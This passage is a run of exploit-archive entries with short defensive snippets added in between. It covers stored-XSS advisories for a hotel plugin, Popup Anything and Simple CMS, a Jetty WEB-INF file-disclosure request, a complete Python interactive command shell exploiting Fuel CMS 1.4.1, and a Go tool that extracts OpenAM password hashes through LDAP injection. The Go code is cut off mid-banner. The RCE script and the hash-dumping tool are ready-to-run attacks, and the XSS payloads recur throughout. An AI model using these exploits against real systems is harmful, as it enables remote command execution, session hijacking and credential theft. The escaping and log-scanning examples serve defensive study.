&gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&area=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&postcode=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
state=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
latitude=&longitude=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description%5B%5D=&
award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=&
room_order%5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=&
Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_and_Extra_Beds=&day_name%5B%5D=Monday+&day_value1%5B%5D=&
day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992
-
POST: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin:http://hotel-eplug-ins.localhost:8000
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Encoding: gzip
-
http://hotel-eplug-ins.localhost:8000/my-account-2/?&profile=all-post
Host: hotel-eplug-ins.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
GET: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=all-post


Solution - Fix & Patch:
=======================
1. Encode and parse all vulnerable input fields on transmit via post method request
2. Restrict the input fields to disallow usage of special chars
3. Encode and escape the output content in the edit and list itself to prevent the execution point
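Added example, not from either advisory or from the affected products: the rendering pattern seen in the PHPJabbers user list (an untrusted name pasted into a text node and into an attribute value) beside its encoded form, the input restriction and output encoding that the fix list above describes, and an HTML-parser check that reports injected elements or event-handler attributes. The template fragment and the name allow-list are constructed; the first payload is the one from the PHPJabbers PoC and the second is a constructed attribute-context payload, so the check goes beyond the text-node case shown on the page.

```python
import html
import re
from html.parser import HTMLParser

# First payload is from the PHPJabbers PoC above; the second is constructed to show
# the attribute-context variant, where the double quote alone closes the value.
PJ_PAYLOAD = '"><img src=evil.source onload=alert(document.cookie)>'
ATTR_PAYLOAD = 'x" onclick="alert(1)'

# Constructed allow-list for a display name: letters, digits, space and a few marks.
NAME_RE = re.compile(r"[A-Za-z0-9 .,'\-]{1,64}")


def is_acceptable_name(value):
    """Input-side restriction (step 2 of the fix list): reject anything outside the allow-list."""
    return NAME_RE.fullmatch(value) is not None


def render_user_cell_vulnerable(name):
    """The pattern from the vulnerable source: the value is concatenated into a text node
    and an attribute value without any encoding."""
    return ('<td class="pj-table-cell-editable"><span class="pj-table-cell-label">' + name +
            '</span><input type="text" data-name="name" value="' + name + '"></td>')


def render_user_cell_safe(name):
    """Output-side fix (step 3): encode for the HTML context. quote=True also converts
    the double quote, which is what the payloads use to break out of the attribute."""
    safe = html.escape(name, quote=True)
    return ('<td class="pj-table-cell-editable"><span class="pj-table-cell-label">' + safe +
            '</span><input type="text" data-name="name" value="' + safe + '"></td>')


class _Collector(HTMLParser):
    """Records every start tag and attribute name the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attr_names = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attr_names.extend(name for name, _ in attrs)


def injected_markup(rendered, expected_tags=("td", "span", "input")):
    """Parse the fragment the way a browser would and return the elements the template
    did not emit plus any on* event-handler attribute; an empty list means clean."""
    parser = _Collector()
    parser.feed(rendered)
    parser.close()
    findings = [t for t in parser.tags if t not in expected_tags]
    findings += [a for a in parser.attr_names if a.lower().startswith("on")]
    return findings


if __name__ == "__main__":
    for payload in (PJ_PAYLOAD, ATTR_PAYLOAD):
        print("accepted by allow-list:", is_acceptable_name(payload))
        print("vulnerable:", injected_markup(render_user_cell_vulnerable(payload)))
        print("safe:      ", injected_markup(render_user_cell_safe(payload)))
```

Step 1 of the fix list (encoding on transmit) is deliberately not the thing the checks rely on: an allow-list at input and context-aware encoding at output together stop both payloads, whereas encoding only on the way in is undone as soon as another code path stores the raw value.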


Security Risk:
==============
The security risk of the persistent cross site scripting web vulnerability in the hotel listing application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.

				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
            
# Exploit Title: WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 03/11/2021
# Exploit Author: Luca Schembri
# Vendor Homepage: https://www.essentialplugin.com/
# Software Link: https://wordpress.org/plugins/popup-anything-on-click/
# Version: < 2.0.4

** Summary **

A user with a low-privileged account can perform stored XSS attacks.


** Plugin description **

Popup Anything is the best popup builder and marketing plugin that
helps you get more email subscribers, increase sales and grow your
business.


Manage powerful modal popup for your WordPress blog or website. You
can add an unlimited popup with your configurations.


** Vulnerable page **

http://{WEBSITE}/wp-admin/post.php?post={ID}&action=edit


** PoC **

Go to the "Popup Anything - Settings" tab and select "Simple Link" as
"Link Type". Select "Link Text" and use this payload:

test" onclick="alert(1)

Save the popup and reload the page. Now click on "Link Text" and it
will execute the JavaScript code.

The same attack works through the "Button Text" and "Popup width" fields.


** Remediation **

Upgrade to version 2.0.4 or later.
            
# Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure 
# Date: 2021-11-03
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.eclipse.org/jetty/
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/
# Version: 9.4.37 ≤ version < 9.4.43, 10.0.1 ≤ version < 10.0.6, 11.0.1 ≤ version < 11.0.6
# Security Advisory: https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
# Tested on: Kali Linux
# CVE : CVE-2021-34429
# Github POC: https://github.com/ColdFusionX/CVE-2021-34429

POC - Access WEB-INF/web.xml 

## Request

GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:9006
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

## Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>
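The request above reaches web.xml because the vulnerable Jetty versions decode `%u002e` as a dot: the raw target does not start with the protected `WEB-INF` prefix, but the path the container resolves does. A defender's check therefore has to canonicalize first and compare afterwards. The following Python is an added example, not code from the advisory or from the Jetty project: it decodes `%uXXXX` and `%XX` escapes until the result is stable, collapses dot segments, flags any request whose canonical path is or lies under `/WEB-INF/` or `/META-INF/`, and runs that rule over a few constructed access-log lines. The log format, the `scan_access_log` helper and the case-insensitive comparison are assumptions made for the demonstration.

```python
import posixpath
import re
from typing import List, Tuple
from urllib.parse import unquote

# Directories a servlet container must never serve to clients.
PROTECTED_PREFIXES = ("/WEB-INF/", "/META-INF/")

# Non-standard %uXXXX escape; the advisory's request uses %u002e for '.'.
_UNICODE_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")

# Request line inside a common-log-format access log entry (assumed format).
_REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not from any real server); the second mirrors the advisory's request.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Nov/2021:08:30:01 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [03/Nov/2021:08:30:02 +0000] "GET /%u002e/WEB-INF/web.xml HTTP/1.1" 200 209
10.0.0.7 - - [03/Nov/2021:08:30:03 +0000] "GET /static/..%2fWEB-INF/web.xml HTTP/1.1" 404 0
10.0.0.9 - - [03/Nov/2021:08:30:04 +0000] "GET /web-inf-docs/readme.txt HTTP/1.1" 200 42
"""


def _decode_once(text: str) -> str:
    """One round of decoding: %uXXXX escapes first, then ordinary %XX escapes."""
    text = _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text)


def canonicalize(raw_target: str) -> str:
    """Reduce a raw request target to the absolute path the container would actually resolve."""
    path = raw_target.split("?", 1)[0]            # the query string never selects a file
    previous = None
    while previous != path:                       # repeat so double-encoding cannot slip through
        previous, path = path, _decode_once(path)
    path = path.replace("\\", "/")                # conservative: treat backslashes as separators
    path = posixpath.normpath(path)               # collapse '.', '..' and repeated slashes
    return path if path.startswith("/") else "/" + path


def is_protected_request(raw_target: str) -> bool:
    """True when the canonical path is, or lies under, a protected directory (case-insensitive)."""
    canonical = canonicalize(raw_target).upper()
    for prefix in PROTECTED_PREFIXES:
        if canonical == prefix.rstrip("/") or canonical.startswith(prefix.upper()):
            return True
    return False


def scan_access_log(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, canonical_path) for each logged request aimed at a protected directory."""
    hits = []
    for line in log_text.splitlines():
        match = _REQUEST_LINE.search(line)
        if not match:
            continue
        target = match.group("target")
        if is_protected_request(target):
            hits.append((line.split(" ", 1)[0], canonicalize(target)))
    return hits


if __name__ == "__main__":
    for client, path in scan_access_log(SAMPLE_LOG):
        print(f"{client} requested protected resource {path}")
```

The third sample line is flagged even though the server answered 404: for detection purposes the attempt matters, not whether it succeeded. The same `canonicalize` function is what a reverse proxy or WAF rule should apply before any prefix comparison, since the comparison on the raw string is exactly what the advisory bypasses.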
            
# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

#!/usr/bin/python3

import requests
from urllib.parse import quote
import argparse
import sys
from colorama import Fore, Style

def get_arguments():
	parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')

	parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')

	parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')

	args = parser.parse_args()

	if len(sys.argv) <=2:
		parser.print_usage()
		sys.exit()
	
	return args


args = get_arguments()
url = args.url 

if "http" not in url:
	sys.stderr.write("Enter valid url")
	sys.exit()

try:
	r = requests.get(url)
	if r.status_code == 200:
		print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)


except requests.ConnectionError:
	print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
	sys.exit()

while True:
	cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
		
	main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"

	r = requests.get(main_url)

	#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">

	output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
	print(output[0])
	if cmd == "exit":
		break
            
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-19
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
# Version: 2.1
# Tested on: Linux

Document Title:
===============
Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2302


Release Date:
=============
2021-10-19


Vulnerability Laboratory ID (VL-ID):
====================================
2302


Common Vulnerability Scoring System:
====================================
5.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents.
Just paste a single line of code on your web page section and start controlling it through the admin area.
Very simple installation - one step installation wizard. Option to include contents into web page sections
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.


Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Full Authentication (Admin/Root Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising
browser-to-web-application requests from the application side.

The persistent cross site scripting web vulnerability is located in the `name`, `username` and `password` parameters of the `newUser`
and `editUser` modules. Remote attackers with a privileged application user account and panel access are able to inject their
own malicious script code as credentials. The injected code executes when the users list is rendered. The request method
used to inject is POST and the attack vector is persistent.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] newUser
[+] editUser

Vulnerable File(s):
[+] admin.php?act=users

Vulnerable Input(s):
[+] Name
[+] Username
[+] Password

Vulnerable Parameter(s):
[+] name
[+] username
[+] password

Affected Module(s):
[+] Users (act=users) (Backend)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a privileged account and low user interaction.
For security demonstration or to reproduce the persistent cross site scripting web vulnerability, follow the provided information and steps below.


PoC: Payload
"><img src='31337'onerror=alert(0)></img>


Vulnerable Source: admin.php?act=users
<tbody><tr>
<td class="headlist"><a href="admin.php?act=users&orderType=DESC&orderBy=name">Name</a></td>
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=email">Email</a></td>
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=username">Username</a></td>
<td class="headlist" width="23%">Password</td>
<td class="headlist" colspan="2">&nbsp;</td>
</tr>
<tr>
<td class="bodylist">c"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylist">keymaster23@protonmail.com</td>
<td class="bodylist">d"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylist">e"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylistAct"><a href="admin.php?act=editUser&id=7" title="Edit"><img class="act" src="images/edit.png" alt="Edit"></a></td>
<td class="bodylistAct"><a class="delete" href="admin.php?act=delUser&id=7" onclick="return confirm('Are you sure you want to delete it?');"
title="DELETE"><img class="act" src="images/delete.png" alt="DELETE"></a></td>
</tr>


--- PoC Session Logs (POST) [Create] ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=c"><img src='31337'onerror=alert(0)></img>&email=tester23@test.de
&username=d"><img src='31337'onerror=alert(0)></img>
&password=e"><img src='31337'onerror=alert(0)></img>&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 5258
content-type: text/html; charset=UTF-8
-
https://simple-cms.localhost:8000/simplecms/31337
Host: simple-cms.localhost:8000
Accept: image/webp,*/*
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 196
content-type: text/html; charset=iso-8859-1
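Both the Popup Anything advisory earlier on this page and the Simple CMS advisory above reduce to the same defect: a stored value is written into HTML without contextual escaping, once inside an attribute (`test" onclick="alert(1)`) and once inside an element body (`"><img src='31337'onerror=alert(0)></img>`). The Python below is an added example, not code from either advisory or vendor. It renders each value the vulnerable way and the hardened way (`html.escape(..., quote=True)`, which covers both contexts), then parses the result with the standard-library HTML parser to show what a browser would actually see: with escaping, no `img` element and no `on*` handler survive. Which attribute the Popup Anything plugin placed the link text in is not stated in that advisory; the `title` attribute and the surrounding markup are assumptions.

```python
import html
from html.parser import HTMLParser
from typing import List, Tuple

# Payloads quoted in the two advisories, used here as constructed test input.
POPUP_ANYTHING_PAYLOAD = 'test" onclick="alert(1)'
SIMPLE_CMS_PAYLOAD = "\"><img src='31337'onerror=alert(0)></img>"


def render_link_vulnerable(link_text: str) -> str:
    """Link text dropped into an attribute and into the element body without escaping.
    The 'title' attribute is an assumption; the advisory does not name the attribute."""
    return '<a href="#" class="popup-link" title="%s">%s</a>' % (link_text, link_text)


def render_link_hardened(link_text: str) -> str:
    """Same markup with html.escape(quote=True): safe in the attribute and in the body."""
    safe = html.escape(link_text, quote=True)
    return '<a href="#" class="popup-link" title="%s">%s</a>' % (safe, safe)


def render_user_row_vulnerable(name: str, email: str, username: str) -> str:
    """Mirrors the users-list cells shown in the Simple CMS advisory: raw values in element bodies."""
    return ('<tr><td class="bodylist">%s</td><td class="bodylist">%s</td>'
            '<td class="bodylist">%s</td></tr>' % (name, email, username))


def render_user_row_hardened(name: str, email: str, username: str) -> str:
    """Same row with every cell escaped; quote=True keeps it safe if a cell is ever reused in an attribute."""
    cells = tuple(html.escape(v, quote=True) for v in (name, email, username))
    return ('<tr><td class="bodylist">%s</td><td class="bodylist">%s</td>'
            '<td class="bodylist">%s</td></tr>' % cells)


class _MarkupInventory(HTMLParser):
    """Collects the element names and on* event-handler attributes a browser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.handlers: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(k.lower() for k, _ in attrs if k.lower().startswith("on"))


def inventory(markup: str) -> Tuple[List[str], List[str]]:
    """Return (sorted unique element names, event-handler attribute names) found in the markup."""
    parser = _MarkupInventory()
    parser.feed(markup)
    parser.close()
    return sorted(set(parser.tags)), parser.handlers


def is_neutralised(markup: str, expected_tags: Tuple[str, ...]) -> bool:
    """True when the markup contains only the elements the template itself emits and no handlers."""
    tags, handlers = inventory(markup)
    return tags == sorted(expected_tags) and not handlers


if __name__ == "__main__":
    print("vulnerable link:", inventory(render_link_vulnerable(POPUP_ANYTHING_PAYLOAD)))
    print("hardened link:  ", inventory(render_link_hardened(POPUP_ANYTHING_PAYLOAD)))
    row = (SIMPLE_CMS_PAYLOAD, "tester@example.test", SIMPLE_CMS_PAYLOAD)
    print("vulnerable row: ", inventory(render_user_row_vulnerable(*row)))
    print("hardened row:   ", inventory(render_user_row_hardened(*row)))
```

The `is_neutralised` check is the kind of assertion worth keeping in a template's test suite: it states which elements the template is allowed to emit and fails the moment stored data adds one. Escaping on output is the fix; filtering the input on the way in (the approach both advisories implicitly criticise) is not, because the payload only has to arrive once.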



Reference(s):
https://simple-cms.localhost:8000/simplecms/admin.php
https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


            
# Exploit Title: OpenAM 13.0 - LDAP Injection
# Date: 03/11/2021
# Exploit Author: Charlton Trezevant, GuidePoint Security
# Vendor Homepage: https://www.forgerock.com/
# Software Link: https://github.com/OpenIdentityPlatform/OpenAM/releases/tag/13.0.0,
# https://backstage.forgerock.com/docs/openam/13/install-guide/index.html#deploy-openam
# Version: OpenAM v13.0.0
# Tested on: go1.17.2 darwin/amd64
# CVE: CVE-2021-29156
# 
# This vulnerability allows an attacker to extract a variety of information
# (such as a user’s password hash) from vulnerable OpenAM servers via LDAP
# injection, using a character-by-character brute force attack.
# 
# https://github.com/guidepointsecurity/CVE-2021-29156
# https://nvd.nist.gov/vuln/detail/CVE-2021-29156
# https://portswigger.net/research/hidden-oauth-attack-vectors

package main

// All of these dependencies are included in the standard library.
import (
	"container/ring"
	"fmt"
	"math/rand"
	"net/http"
	"net/url"
	"sync"
	"time"
)

func main() {
	// Base URL of the target OpenAM instance
	baseURL := "http://localhost/openam/"

	// Local proxy (such as Burp)
	proxy := "http://localhost:8080/"

	// Username whose hash should be dumped
	user := "amAdmin"

	// Configurable ratelimit
	// This script can go very, very fast. But it's likely that would overload Burp and the target server.
	// The default ratelimit of 6 can retrieve a 60 character hash through a proxy in about 5 minutes and
	// ~1700 requests.
	rateLimit := 6

	// Beginning of the LDAP injection payload. %s denotes the position of the username.
	payloadUsername := fmt.Sprintf(".well-known/webfinger?resource=http://x/%s)", user)
	partURL := fmt.Sprintf("%s%s", baseURL, payloadUsername)

	// Your LDAP injection payloads. %s denotes the position at which the constructed hash + next test character
	// will be inserted.
	// These are configured to dump password hashes. But you can reconfigure them to dump other data, such as
	// usernames/session IDs/etc depending on your use case.
	// N.B. you will likely need to update the brute-forcing keyspace depending on the data you're trying to dump.
	testCharPayload := "(sunKeyValue=userPassword=%s*)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
	testCrackedPayload := "(sunKeyValue=userPassword=%s)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"

	// The keyspace for brute-forcing individual characters is stored in a ringbuffer
	// You may need to change how this is initialized depending on the types of data you're
	// trying to retrieve. By default, this is configured for password hashes.
	dict := makeRing()

	// Working characters for each step are concatenated with this string. Further tests are conducted
	// using this value as it's built.
	// Importantly, if you already have part of the hash you can put it here as a crib. This allows you
	// to resume a previous brute-forcing session.
	password := ""

	proxyURL, _ := url.Parse(proxy)

	// You can modify the HTTP client configuration below.
	// For example, to disable the HTTP proxy or set a different
	// request timeout value.
	client := &http.Client{
		Transport: &http.Transport{
			Proxy: http.ProxyURL(proxyURL),
		},
		Timeout: 30 * time.Second,
	}

	// Channels used for internal signaling
	cracked := make(chan string, 1)
	foundChar := make(chan string, 1)

	wg := &sync.WaitGroup{}
	wg.Add(1)

	// All hacking tools need a header. You may experience a 10-15x performance improvement
	// if you replace the flower-covered header with the gothic bleeding/flaming/skull-covered
	// ASCII art typical of these kinds of tools.
	printHeader()

loop:
	for {
		select {
		case <-cracked:
			// Full hash test succeeds, terminate everything
			// N.B. this feature does not work, see my comments on checkCracked.
			fmt.Printf("Cracked! Password hash is: \"%s\"\n", password)
			wg.Done()
			break loop

		case char := <-foundChar:
			// In the event that a test character succeeds, that thread will pass it along in the
			// foundChar channel to signal success. It's then concatenated with the known-good
			// password hash and the whole thing is tested in a query
			// This doesn't work because OpenAM doesn't respond to direct queries containing the password hash
			// in the manner I expect. But it might still work for other types of data.
			password += char
			fmt.Printf("Progress so far: '%s'\n", password)

			// Forgive these very ugly closures
			go (func(client *http.Client, url, payload *string, password string, cracked *chan string) {
				// Add random jitter before submitting request
				time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
				time.Sleep(1 * time.Second)
				checkCracked(client, url, payload, &password, cracked)
			})(client, &partURL, &testCharPayload, password, &cracked)

		default:
			for i := 0; i < rateLimit-1; i++ {
				testChar := dict.Value.(string)
				go (func(client *http.Client, url, payload *string, password, testChar string, foundChar *chan string) {
					time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
					time.Sleep(1 * time.Second)
					getChar(client, url, payload, &password, &testChar, foundChar)
				})(client, &partURL, &testCrackedPayload, password, testChar, &foundChar)
				dict = dict.Next()
			}

			time.Sleep(1 * time.Second)
		}
	}

	wg.Wait()
}

// checkCracked tests a complete string in a query against the OpenAM server to
// determine whether the exact, full hash has been retrieved.
// This doesn't actually work, because the server doesn't respond as I'd expect
// A better implementation would probably watch until all positions in the ringbuffer
// are exhausted in testing and terminate (since there's no way to progress further)
func checkCracked(client *http.Client, targetURL, payload, password *string, cracked *chan string) {
	fullPayload := fmt.Sprintf(*payload, url.QueryEscape(*password))
	fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)

	req, err := http.NewRequest("GET", fullURL, nil)
	if err != nil {
		fmt.Printf("checkCracked: %s", err.Error())
		return
	}

	res, err := client.Do(req)
	if err != nil {
		fmt.Printf("checkCracked: %s", err.Error())
		return
	}

	if res.StatusCode == 200 {
		*cracked <- *password
		return
	}

	if res.StatusCode == 404 {
		return
	}

	fmt.Printf("checkCracked: got status code of %d for payload %s", res.StatusCode, payload)
}

// getChar tests a given character at the end position of the configured payload and dumped hash progress.
func getChar(client *http.Client, targetURL, payload, password, testChar *string, foundChar *chan string) {
	// Concatenate test character -> password -> payload -> attack URL
	combinedPass := url.QueryEscape(fmt.Sprintf("%s%s", *password, *testChar))
	fullPayload := fmt.Sprintf(*payload, combinedPass)
	fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)

	req, err := http.NewRequest("GET", fullURL, nil)
	if err != nil {
		fmt.Printf("getChar: %s", err.Error())
		return
	}

	res, err := client.Do(req)
	if err != nil {
		fmt.Printf("getChar: %s", err.Error())
		return
	}

	if res.StatusCode == 200 {
		*foundChar <- *testChar
		return
	}

	if res.StatusCode == 404 {
		return
	}

	fmt.Printf("getChar: got status code of %d for payload %s", res.StatusCode, payload)
}

// makeRing instantiates a ringbuffer and initializes it with test characters common in base64
// and password hash encodings.
// Bruteforcing on a character-by-character basis can only go as far as your dictionary will take
// you, so be sure to update these strings if the keyspace for your use case is different.
func makeRing() *ring.Ring {
	var upcase string = `ABCDEFGHIJKLMNOPQRSTUVWXYZ`
	var lcase string = `abcdefghijklmnopqrstuvwxyz`
	var num string = `1234567890`
	var punct string = `$+/.=`

	var dictionary string = upcase + lcase + num + punct

	buf := ring.New(len(dictionary))

	for _, c := range dictionary {
		buf.Value = fmt.Sprintf("%c", c)
		buf = buf.Next()
	}

	return buf
}

// printHeader is cool.
func printHeader() {
	fmt.Printf(`

											    _______  ,---.  ,---.   .-''-.   
											   /   __  \ |   /  |   | .'_ _   \  
											  | ,_/  \__)|  |   |  .'/ ( ' )   ' 
											,-./  )      |  | _ |  |. (_ o _)  | 
											\  '_ '')    |  _( )_  ||  (_,_)___| 
											 > (_)  )  __\ (_ o._) /'  \   .---. 
											(  .  .-'_/  )\ (_,_) /  \  '-'    / 
											 '-''-'     /  \     /    \       /  
											   '._____.'    '---'      ''-..-'   
                                     
